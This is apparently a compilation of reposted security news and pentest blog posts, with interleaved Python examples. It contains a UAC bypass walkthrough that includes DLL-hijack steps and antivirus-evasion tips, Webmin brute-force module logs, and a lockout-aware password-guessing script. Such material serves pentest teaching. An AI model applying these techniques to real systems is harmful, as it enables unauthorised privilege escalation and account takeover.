It's impossible to fully verify the documents' authenticity without confirmation from someone with direct knowledge of Microsoft and DITU compliance practices, and those parties refused to comment. But there are multiple signs that indicate the documents are legitimate. "I don't see any indication that they're not real," Cardozo said. "If I was going to fake something like this, I would try to fake it up a lot more sensational than this." That the SEA twice attacked Microsoft with a phishing attack before leaking these documents is well documented. On Jan. 11, the day of the second attack, the SEA hijacked the company's blog and Twitter account.
One representative told the Verge that day that it was part of a bigger plan: "We are making some distraction for Microsoft employees so we can success in our main mission," the hacker said. In a blog post nearly two weeks later, Microsoft admitted: "[W]e have learned that there was unauthorized access to certain employee email accounts, and information contained in those accounts could be disclosed. It appears that documents associated with law enforcement inquiries were stolen." A source familiar with several of the email addresses of the Microsoft employees in the emails confirmed the addresses were authentic.

When reached for comment, the company reiterated its stance that it complies with government demands as required by law. A spokesperson added that "as pursuant to U.S. law, Microsoft is entitled to seek reimbursement for costs associated with compliance with valid legal demands. ... To be clear, these reimbursements cover only a portion of the costs we actually incur to comply with legal orders." A spokesperson for the FBI declined to comment and deferred questions to Microsoft, "given that SEA claims to have stolen the documents" from there.

Indeed, there's plenty of history of communications companies charging compliance costs for cooperating with intelligence agencies' requests for people's information. The CIA pays AT&T more than $10 million annually for access to its phone records, government officials told the New York Times. The Guardian, referencing other documents provided by Snowden, has reported that the NSA paid millions to Microsoft and the other eight companies used in PRISM for compliance costs. Only the earliest of the Microsoft invoices provided by the SEA, dated May 10, 2012, breaks down requests by type of legal request, and it shows them all to be explicitly legal, though nothing in the documents indicates the later invoices refer to illegal surveillance.
User information obtained by subpoena costs $50, by court order $75, and by search warrant $100. The requests come from FBI offices all around the U.S. Later invoices to DITU don't break down requests by subpoena and court order, though the format is otherwise similar, and costs begin to rise to $100 and $200 per request. And though the costs vacillate slightly depending on the invoice, they appear to be roughly in line with industry standards. Ashkan Soltani, who coauthored a Yale study on how much it costs agencies like the FBI to track targets by tapping phone companies for their cellphone locations, said that the range of costs seen in the SEA documents ($50 to $200 per order to Microsoft) "did seem a fair cost." The invoices don't make explicit the exact type of information Microsoft charges DITU to provide, which may account for the price changes.

The biggest suspicion espoused by the experts we spoke with was just how apparently easy it was for the SEA to acquire this sort of information. If the documents aren't forged, that means Microsoft and the FBI simply email invoices and references to a presumably classified process. "I'm surprised that they're doing it by email," Soltani said. "I thought it would be a more secure system."

Via The Daily Dot - Hacked emails show what Microsoft charges the FBI for user data
-
UAC is User Account Control. Introduced in Windows Vista, UAC is a collection of technologies that make it possible to use Windows conveniently without administrator privileges and to elevate your rights when needed. UAC has a lot of moving parts and encompasses a lot of things. This post focuses on Windows integrity levels and UAC elevation prompts. I will first explain some UAC concepts and then dive into three attacks to get past UAC.

Process Integrity Levels

In Windows Vista and later, processes run at three levels of integrity that matter for this discussion: high, medium, and low (System and Untrusted levels also exist, but they do not figure here). A high integrity process has administrator rights. A medium integrity process is one that runs with standard user rights. A low integrity process is very restricted: it can not write to most of the registry and it is limited from writing to most locations in the current user's profile. Protected Mode Internet Explorer runs with low integrity. The idea is to limit the amount of damage an attacker may do if they exploit the browser. Most desktop applications run in a medium integrity process, even if the current user is a local administrator. Use Process Explorer to see which integrity level your programs are running at.

UAC Settings

To perform a privileged action, a program must run another program and request the high integrity level at that time. If the user is an administrator, what happens next will depend on their UAC settings. There are four UAC settings:

Always Notify. This setting is the highest UAC setting. It will prompt the user when any program, including a built-in Windows program, wants higher privileges.

Notify me only when programs try to make changes to my computer. This is the default UAC setting. This setting does not prompt the user when some built-in Windows programs want higher privileges. It will prompt the user when any other program wants higher privileges. This distinction is important and it plays into the UAC bypass attack that we will cover in a moment. 
Notify me only when programs try to make changes to my computer (do not dim my desktop). This is the same as the default setting, except the user's desktop does not dim when the UAC elevation prompt comes up. This setting exists for computers that lack the computing power to dim the desktop and show a dialog on top of it.

Never notify. This option takes us back to life before Windows Vista. On Windows 7, if a user is an administrator, all of their programs will run with high integrity. On Windows 8, programs run at the medium integrity level, but anything run by an administrator that requests elevated rights gets them without a prompt.

If the user is not an administrator, they will see a prompt that asks for the username and password of a privileged user when a program tries to elevate. Microsoft calls this "over the shoulder" elevation, as someone is, presumably, standing over the shoulder of the user and typing in their password. If the UAC settings are set to Never Notify, the system will automatically deny any request by a non-administrator to elevate.

Who Am I?

When I get a foothold from a client-side attack, I have a few questions I like to answer right away. First, I like to know which user I'm currently executing code as. Second, I like to know which rights I have. With UAC this becomes especially complicated. One way I like to sort myself out is with the Windows command whoami /groups. This command will print which groups my current user belongs to. It will also print which integrity level my command ran with. If my command ran in a high integrity context, I will see the group Mandatory Label\High Mandatory Level. This means I have administrator rights. If my command ran in a medium integrity context, I will see the group Mandatory Label\Medium Mandatory Level. This means I have standard user rights. 
RunAs

If I find myself in a medium integrity process run by a user in an administrators group, there is potential to elevate from standard user rights to administrator rights. One option is to use the ShellExecute function with the runas verb. This will run a program and request elevated rights. If UAC is set to anything other than Never Notify, the user will see a prompt that asks them if they would like to allow the action to happen. This is not completely implausible: Oracle's Java Updater randomly prompts me all of the time. The Metasploit Framework's exploit/windows/local/ask module by mubix implements this attack for you. Make sure you set EXE::Custom to avoid anti-virus! If the user accepts the prompt, the system will run my program in a high integrity context. Remember, medium integrity is standard user rights. High integrity is administrator rights and this is what we're after.

Bypass UAC

The RunAs option prompts the user and that's an opportunity to get caught. We want a way to spawn a high integrity process from a medium integrity process without a prompt. Fortunately, there is a way to do this: the bypass UAC attack. This attack comes from Leo Davidson, who made a proof-of-concept for it in 2009. David Kennedy and Kevin Mitnick popularized this attack in a 2011 DerbyCon talk. They also released the exploit/windows/local/bypassuac Metasploit Framework module that uses Leo's proof-of-concept for the heavy lifting. The bypass UAC attack requires that UAC is set to the default Notify me only when programs try to make changes to my computer. If UAC is set to Always Notify, this attack will not work. This attack also requires that our current user is in an administrators group.

Bypass UAC: How It Works

This is a fascinating attack whose inner workings are taken for granted. Please allow me the blog space to describe it in depth. Our story starts with COM, the Component Object Model in Windows. 
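The three facts the post has covered so far (integrity level, whether the user is in Administrators, and which UAC slider position is in effect) decide which of its routes applies. The following is an added Python example, not code from the post, from Cobalt Strike or from Metasploit. It parses a constructed `whoami /groups` sample, names the UAC slider position from the two registry values that back it (ConsentPromptBehaviorAdmin and PromptOnSecureDesktop under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, readable with `reg query`), and then applies the conditions stated above. The SID-to-level mapping and the registry value names are standard Windows facts; the route names are my own labels.

```python
import re

# Integrity-level SIDs as shown by `whoami /groups` (Mandatory Label\... Mandatory Level).
INTEGRITY_SIDS = {
    "S-1-16-4096": "low",
    "S-1-16-8192": "medium",
    "S-1-16-12288": "high",
    "S-1-16-16384": "system",
}
ADMINISTRATORS_SID = "S-1-5-32-544"  # BUILTIN\Administrators

# The four slider positions, keyed on (ConsentPromptBehaviorAdmin, PromptOnSecureDesktop)
# from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
UAC_SETTINGS = {
    (2, 1): "always_notify",
    (5, 1): "default",          # notify only when programs try to make changes
    (5, 0): "default_no_dim",   # same auto-elevate behaviour, no secure desktop
    (0, 0): "never_notify",
}

# Constructed sample: an administrator's filtered (medium-integrity) token. The
# Administrators group is still listed, but marked "Group used for deny only".
SAMPLE_WHOAMI = """\
GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ =================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Administrators                 Alias            S-1-5-32-544 Group used for deny only
BUILTIN\\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level Label            S-1-16-8192
"""


def parse_whoami_groups(text):
    """Return (integrity_level, in_admin_group) from `whoami /groups` output.

    in_admin_group is True even for a deny-only entry: an admin user holding a
    medium-integrity token is exactly the situation the RunAs and bypass UAC
    routes need.
    """
    level, admin = None, False
    for line in text.splitlines():
        m = re.search(r"\b(S-1-16-\d+)\b", line)
        if m and m.group(1) in INTEGRITY_SIDS:
            level = INTEGRITY_SIDS[m.group(1)]
        if re.search(r"\b" + re.escape(ADMINISTRATORS_SID) + r"\b", line):
            admin = True
    return level, admin


def uac_setting(consent_prompt_behavior_admin, prompt_on_secure_desktop, enable_lua=1):
    """Name the UAC slider position from the registry values (EnableLUA=0 means UAC is off)."""
    if enable_lua == 0:
        return "never_notify"
    return UAC_SETTINGS.get((consent_prompt_behavior_admin, prompt_on_secure_desktop), "custom")


def elevation_routes(level, admin, setting):
    """Which of the routes described in the post apply to this foothold."""
    if level in ("high", "system"):
        return ["already_elevated"]
    if not admin:
        return []  # only an over-the-shoulder prompt for someone else's password
    if setting == "never_notify":
        return ["runas_no_prompt"]      # elevation requests are granted silently
    routes = ["runas_prompt"]           # ShellExecute runas / exploit/windows/local/ask
    if setting in ("default", "default_no_dim"):
        # auto-elevate is on, so the IFileOperation + DLL hijack route is open
        routes.append("bypassuac")
    return routes


if __name__ == "__main__":
    level, admin = parse_whoami_groups(SAMPLE_WHOAMI)
    print(level, admin, elevation_routes(level, admin, uac_setting(5, 1)))
```

Run on a real host, the inputs come from `whoami /groups` and `reg query` on the Policies\System key; the "custom" result covers slider positions set by group policy that do not map to the four presets.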
COM is a way of writing components that other programs may use and re-use. One of the benefits of COM is that it's language neutral. I find it extremely complicated and unappealing to work with. I suspect others share my feelings.

Some COM objects automatically elevate themselves to a high integrity context when run from a program signed with Microsoft's code signing certificate. If the same COM object is instantiated from a program that was not signed by Microsoft, it runs with the same integrity as the current process. The COM distinction between Microsoft and non-Microsoft programs has little meaning though. I can't create a COM object in a high integrity context directly, because my programs are not signed with Microsoft's certificate. I can spawn a Microsoft-signed program (e.g., notepad.exe) and inject a DLL into it though. From this DLL, I may instantiate a self-elevating COM object of my choice. When this COM object performs an action, it will do so from a high integrity context.

Leo's Bypass UAC attack creates an instance of the IFileOperation COM object. This object has methods to copy and delete files on the system. Run from a high integrity context, this object allows us to perform a privileged file copy to any location on the system.

We're not done yet! We need to go from a privileged file copy to code execution in a high integrity process. Before we can make this leap, I need to discuss another Windows 7 fun fact. Earlier, we went over the different UAC settings. The default UAC setting will not prompt the user when some built-in Windows programs try to elevate themselves. More practically, this means that some built-in Windows programs always run in a high integrity context. These programs that automatically elevate have a few properties: they are signed with Microsoft's code signing certificate, they are located in a "secure" folder (e.g., c:\windows\system32), and they request the right to autoElevate in their manifest. 
We can find which programs autoElevate themselves with a little strings magic (Sysinternals strings; the -s switch recurses into subdirectories):

cd c:\windows\
strings -s *.exe | findstr /i autoelevate

Now we know which programs automatically run in a high integrity context AND we have the ability to perform an arbitrary copy on the file system. How do we get code execution? We get code execution through DLL search order hijacking. The public versions of the bypass UAC attack copy a CRYPTBASE.dll file to c:\windows\system32\sysprep and run c:\windows\system32\sysprep\sysprep.exe. When sysprep.exe runs it will search for CRYPTBASE.dll and find the malicious one first. Because sysprep.exe automatically runs in a high integrity context (when UAC is set to default), the code in the attacker controlled CRYPTBASE.dll will execute in this high integrity context too. From there, we're free to do whatever we like. We have our administrator privileges.

Holy Forensic Artifacts Batman!

I mentioned earlier that the Metasploit Framework's bypassuac module uses Leo Davidson's proof-of-concept. This module drops several files to disk. It uses Leo's bypassuac-x86.exe (and bypassuac-x64.exe) to perform the privileged file copy from a medium integrity context. It also drops a CRYPTBASE.dll file to disk and the executable we want to run. This module, when run, also creates a tior.exe and several w7e_*.tmp files in the user's temp folder. I have no idea what the purpose of these files is. When you use this module, you control the executable to run through the EXE::Custom option. The other artifacts are put on disk without obfuscation. For a long time, these other artifacts were caught by anti-virus products. A recent commit to the Metasploit Framework strips several debug and logging messages from these artifacts. This helps them get past the ire of anti-virus, for now. A better approach is to use a module that has as little on-disk footprint as possible. Fortunately, Metasploit contributor Ben Campbell (aka Meatballs) is here to save the day. 
A recent addition to the Metasploit Framework is the exploit/windows/local/bypassuac_inject module. This module compiles the UAC bypass logic into a reflective DLL. It spawns a Microsoft-signed program and injects the UAC bypass logic directly into it. The only thing that needs to touch disk is the CRYPTBASE.dll file.

Bypass UAC on Windows 8 (and 8.1)

In this post, I've focused heavily on Windows 7. Leo's proof-of-concept and the bypassuac modules in the Metasploit Framework do not work on Windows 8. This is because the DLL hijacking opportunity against sysprep.exe does not work in Windows 8. The Bypass UAC attack is still possible though. A few releases ago, I added bypassuac to Cobalt Strike's Beacon. I do not invest in short-term features, so I had to convince myself that this attack had a viable future. I audited all of the autoElevate programs on a stock Windows 8.1 to find another DLL hijacking opportunity. I had to find a program that would load my DLL before displaying anything to the user. There were quite a few false starts. In the end, I found my candidate. Beacon's UAC bypass is similar to Ben Campbell's: it performs all of the UAC bypass logic in memory. Beacon's UAC bypass also generates an anti-virus safe DLL from Cobalt Strike's Artifact Kit. Beacon's UAC bypass checks the system it's running on too. If it's Windows 7, Beacon uses sysprep.exe to get code execution in a high integrity context. If it's Windows 8, it uses another opportunity. If you're having trouble with the alternatives, Beacon's version of this attack is an option.

Bypass UAC on Windows Vista

The Bypass UAC attack does not work on Windows Vista. In Windows Vista, the user has to acknowledge every privileged action. This is the same as the Always Notify option in Windows 7 and later. The UAC settings in Windows 7 came about because UAC became a symbol of what was "wrong" with Windows Vista. 
Microsoft created UAC settings and made some of their built-in programs auto-elevate by default to prompt the user less often. These changes for user convenience created the loophole described in this post.

Lateral Movement and UAC

The concept of process integrity level only applies to the current system. When you interact with a network resource, your access token is all that matters. If your current user is a domain user and your domain user is a local administrator on another system, you can get past UAC. Here's how this works: you may use your token to interact with another system as an administrator. This means you may copy an executable to that other system and schedule it to run. If you get access to another system this way, you may repeat the same process to regain access to your current system with full rights. You may use the Metasploit Framework's exploit/windows/local/current_user_psexec to do this.

Summary

These UAC bypass attacks are among my favorite hacker techniques. They're a favorite because they take advantage of a design loophole rather than a fixed-with-the-next-update memory corruption flaw. In theory, we will have these attacks for a long time. Source
-
-
Your email is important to you, and making sure it stays safe and always available is important to us. As you go about your day reading, writing, and checking messages, there are tons of security measures running behind the scenes to keep your email safe, secure, and there whenever you need it. Starting today, Gmail will always use an encrypted HTTPS connection when you check or send email. Gmail has supported HTTPS since the day it launched, and in 2010 we made HTTPS the default. Today's change means that no one can listen in on your messages as they go back and forth between you and Gmail's servers, no matter if you're using public WiFi or logging in from your computer, phone or tablet. In addition, every single email message you send or receive (100% of them) is encrypted while moving internally. This ensures that your messages are safe not only when they move between you and Gmail's servers, but also as they move between Google's data centers, something we made a top priority after last summer's revelations. Of course, being able to access your email is just as important as keeping it safe and secure. In 2013, Gmail was available 99.978% of the time, which averages to less than two hours of disruption for a user for the entire year. Our engineering experts look after Google's services 24x7 and if a problem ever arises, they're on the case immediately. We keep you informed by posting updates on the Apps Status Dashboard until the issue is fixed, and we always conduct a full analysis on the problem to prevent it from happening again. Our commitment to the security and reliability of your email is absolute, and we're constantly working on ways to improve. You can learn about additional ways to keep yourself safe online, like creating strong passwords and enabling 2-step verification, by visiting the Security Center: https://www.google.com/help/security. Source
-
EnjoyCSS is an advanced CSS3 generator that saves your time. Its handy and simple UI allows you to adjust rich graphical styles quickly and without coding. Online CSS3 Code Generator With a Simple Graphical Interface - EnjoyCSS
-
Don't click that link! Viral Facebook posts with shocking video of Malaysia Airlines MH370 are a scam. (Credit: Screenshot by Eric Mack/CNET) Don't click on any link that says it has shocking video of Malaysia Airlines Flight MH370. According to multiple reports, links promising resolution for the missing Flight MH370 are scams. Videos with titles like "Malaysian Airlines missing flight MH370 found in Sea -- 50 people alive saved" have spread through social media sites like Facebook and Twitter, Wired U.K. reports. Malware intelligence analyst at Malwarebytes Chris Boyd told Wired that links being spread through Twitter originally appeared on Facebook. The blog Hoax-Slayer.com warned of a fake news link claiming that the Malaysian plane has been found in the Bermuda Triangle. According to blogger Brett M. Christensen, the photos used to promote the video are from an April 2013 Lion Air plane crash near Bali. Facebook users lured by shocking videos typically find that they must complete a survey before continuing. Christensen says the links are designed to look like a Facebook survey, requesting permission to gain access to your profile. Giving permission to your profile could give hackers personal information, like phone numbers and e-mail addresses. Scam artists seek a payday from affiliate marketing schemes that pay money when a user participates in a survey. A spokesperson for Facebook told CBS News that the company has removed the links. Phishing and spam are a violation of the social network's community standards. Via Fake Malaysia Airlines links spread malware | Security & Privacy - CNET News
-
Tutorial on How to Crack Zip files using Fcrackzip Source: 101hacker.com
-
Authors: Jonny Milliken Valerio Selis Alan Marshall This paper analyses and proposes a novel detection strategy for the ‘Chameleon’ WiFi AP-AP virus. Previous research has considered virus construction, likely virus behaviour and propagation methods. The research here describes development of an objective measure of virus success, the impact of product susceptibility, the acceleration of infection and the growth of the physical area covered by the virus. An important conclusion of this investigation is that the connectivity between devices in the victim population is a more significant influence on virus propagation than any other factor. The work then proposes and experimentally verifies the application of a detection method for the virus. This method utilises layer 2 management frame information which can detect the attack while maintaining user privacy and user confidentiality, a key requirement in many security solutions. Download: http://jis.eurasipjournals.com/content/pdf/1687-417X-2013-2.pdf
-
Colin and I were working on an memory image the other day and needed to find DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool Volatility. Volatility doesn't really give you a good option to search for loaded dlls by process name. You can specify a pid to do this, but when you have many processes that have the same name (ie svchost.exe) you can end up with a nasty command like this to do the trick. This really wasn't working for us so we took a look at Volatility's source code and made some small adjustments. We modified the taskmods.py module that ultimately affects the dlllist module. Normally if you select dlllist plugin with the -h option it gives you various options you can use such as an offset or a pid as seen below: With our modified taskmods.py you have a new option for adding a process by name or a list of processes by name as seen below: Now we can simply give it the svchost.exe process by name and get a list of loaded DLL's by processes running by that name. If you have a non-standard svchost.exe process running then this will pick it up as well, but that situation might also help identify a compromise So executing volatility with the following command vol.py -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe now gives an output of: I am sure there are better ways at getting the same information, but this worked rather well for us and we thought we would share. You can get the module at our github repository. To install it just replace the taskmods.py from your $VOLATILITYHOME/volatility/plugins directory with our taskmods.py. We have tested it on volatility 2.2, 2.3, 2.3.1 on XP and Windows 7 with no problems. Source
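The post's screenshots of the modified plugin did not survive extraction. As an added, stand-alone illustration (not the modified taskmods.py, and not a Volatility plugin), the Python below does the same name-based selection over pslist-style text and adds the check the post hints at: a svchost.exe whose parent is not services.exe is worth a second look. The pslist rows are constructed; on a real image you would feed it the output of `vol.py ... pslist`.

```python
import re

# Constructed rows in the shape of Volatility 2's pslist output. The svchost.exe with
# PID 2244 is the planted oddity: its parent is explorer.exe rather than services.exe.
SAMPLE_PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
------------------ -------------------- ------ ------ ------ -------- ------ ------ ----------------------------
0xfffffa8000c8a040 System                    4      0     86      528 ------      0 2014-03-10 09:55:01 UTC+0000
0xfffffa8001a3e060 wininit.exe             396    328      3       77      0      0 2014-03-10 09:55:09 UTC+0000
0xfffffa8001b10b30 services.exe            492    396      8      223      0      0 2014-03-10 09:55:10 UTC+0000
0xfffffa8001b52060 svchost.exe             608    492     10      357      0      0 2014-03-10 09:55:11 UTC+0000
0xfffffa8001c10b30 svchost.exe             700    492     19      441      0      0 2014-03-10 09:55:11 UTC+0000
0xfffffa8002a4e060 explorer.exe           1620   1588     34      912      1      0 2014-03-10 09:56:02 UTC+0000
0xfffffa8002b7d060 svchost.exe            2244   1620      2       48      1      0 2014-03-10 10:12:45 UTC+0000
"""

# Offset, name, PID and PPID are all we need; header and rule lines do not match.
ROW_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(\d+)\s+(\d+)")


def parse_pslist(text):
    """Turn pslist text into a list of dicts keyed by offset, name, pid, ppid."""
    procs = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            procs.append({"offset": m.group(1), "name": m.group(2),
                          "pid": int(m.group(3)), "ppid": int(m.group(4))})
    return procs


def by_name(procs, names):
    """What `-n name1,name2` does: case-insensitive match on the image name."""
    wanted = {n.lower() for n in names}
    return [p for p in procs if p["name"].lower() in wanted]


def odd_svchosts(procs):
    """svchost.exe instances not started by services.exe."""
    by_pid = {p["pid"]: p for p in procs}
    odd = []
    for p in by_name(procs, ["svchost.exe"]):
        parent = by_pid.get(p["ppid"])
        if parent is None or parent["name"].lower() != "services.exe":
            odd.append(p)
    return odd


if __name__ == "__main__":
    procs = parse_pslist(SAMPLE_PSLIST)
    for p in by_name(procs, ["svchost.exe"]):
        print(p["offset"], p["pid"], p["ppid"])
    print("suspicious:", [p["pid"] for p in odd_svchosts(procs)])
```

The offsets it returns are the ones you would hand to dlllist with --offset when you want a single process rather than all of them.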
-
So I ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because I had about 60+ hosts to check and that's just tedious enough to make you write code and not manually do it. At least one gotcha I discovered is that webmin will block the IP after four or five (usually 5) attempts. I believe the default is 300 seconds; it will also supposedly increase the delay if the same host keeps hitting it. I took the approach to throw 5 passwords at it; if it's not something super obvious then I'd move along. Maybe not the best solution but I wanted to make sure it wasn't root/root or webmin/webmin and move on.

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
msf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)

and looks like this when it works

[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

** note you have to unset the PASSWORD value too, for some reason it's populating with a blank password and trying that, which sucks if you only have five chances. Code is here https://github.com/carnal0wnage/metasploit-framework/blob/webminmodule/modules/auxiliary/scanner/http/webmin_login.rb figured I'd let the blog serve as a way to let people test prior to doing a pull request. Source
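The lockout is the whole design constraint here: with five tries before a 300 second block, the guesser has to spend them on the obvious candidates and stop the moment the host answers 403, rather than burn the budget and keep going as the module above does. The following is an added Python example, not the carnal0wnage module (which is Ruby) and not Webmin code. It runs the budgeted loop against a constructed stand-in for session_login.cgi on a loopback port so it can be exercised offline. The form field names (page, user, pass), the 302 plus sid cookie as the success signal and the 403 on block are modeled on the module output above and are assumptions about the real service.

```python
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

ATTEMPT_BUDGET = 5  # Webmin locks the source IP after roughly five failures (300 s by default)


class FakeWebmin(BaseHTTPRequestHandler):
    """Constructed stand-in for Webmin's session_login.cgi, enough to exercise the client:
    302 + sid cookie on the right credentials, 403 once the failure count hits block_after."""
    valid = ("root", "password")
    block_after = 5
    failures = 0

    def do_POST(self):
        cls = type(self)
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        password = form.get("pass", [""])[0]
        if cls.failures >= cls.block_after:
            self.send_response(403)
            self.end_headers()
            return
        if (user, password) == cls.valid:
            self.send_response(302)
            self.send_header("Location", "/")
            self.send_header("Set-Cookie", "sid=0123456789abcdef; path=/")
            self.end_headers()
            return
        cls.failures += 1
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"Login failed. Please try again.")

    def log_message(self, *args):
        pass  # keep the demo quiet


def try_login(host, port, user, password):
    """One attempt; returns 'success', 'failed' or 'blocked'. Redirects are not followed."""
    body = urllib.parse.urlencode({"page": "/", "user": user, "pass": password})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", "/session_login.cgi", body,
                 {"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    resp.read()
    cookie = resp.getheader("Set-Cookie") or ""
    conn.close()
    if resp.status == 403:
        return "blocked"
    if resp.status == 302 and "sid=" in cookie:
        return "success"
    return "failed"


def budgeted_guess(host, port, user, passwords, budget=ATTEMPT_BUDGET):
    """Try at most `budget` passwords; stop on success or as soon as the host blocks us."""
    attempts = []
    for password in passwords[:budget]:
        result = try_login(host, port, user, password)
        attempts.append((password, result))
        if result != "failed":
            break
    return attempts


def run_demo(valid=("root", "password"), block_after=5,
             passwords=("", "root", "webmin", "password", "letmein", "password1")):
    """Start the stand-in on a loopback port, run the budgeted guesser, tear it down."""
    FakeWebmin.valid, FakeWebmin.block_after, FakeWebmin.failures = valid, block_after, 0
    server = HTTPServer(("127.0.0.1", 0), FakeWebmin)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        return budgeted_guess("127.0.0.1", server.server_address[1], "root", list(passwords))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for password, result in run_demo():
        print(f"{password!r}: {result}")
```

Note that the blank password counts against the budget exactly as the post complains about; drop it from the list (and unset PASSWORD in the module) unless you have reason to expect it.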
-
Sir Tim Berners-Lee. On 12 March 2014 the World Wide Web turns the fine age of 25. Nobody is better placed to discuss the evolution of the WWW than the inventor of the web's protocols, Sir Tim Berners-Lee. In an interview given at SXSW, Sir Tim discussed the origin of the idea of the WWW and what inspired him to invent the virtual space. As Berners-Lee points out, many people were reluctant about the WWW in the beginning. Even though the internet existed 25 years ago, people were used to taking in information the traditional way. At first they did not see the advantage of exposing their data to the whole world. Why did Berners-Lee turn the introduction of URL addresses into child's play? He explains the meaning of "http://" and how the protocol influenced the years that followed. At 25, the Web is a young adult, says Berners-Lee. It is independent, it lives on its own. It has rights, but also responsibilities. Berners-Lee believes the web should accurately reflect the rights and responsibilities of those who use it. "There are rights that need to be brought to the fore," Berners-Lee says. The web can be an instrument of freedom, but also of repression. "Some countries use the internet to immobilise their citizens, to spy on them," says Berners-Lee. He stresses that corporate control of the web, or a monopoly over the laws underpinning how the www works, affects the WWW space to a large extent. Corporate-sponsored legislation that impedes the free flow of information will continue to affect us, the inventor of the Web estimates. Berners-Lee says that 25 years ago he would not have suspected that the web would have such an impact on business and society. He would like technologists to use their social intelligence more often, to build sites for interaction between peoples and cultures, to combat xenophobia and ignorance.
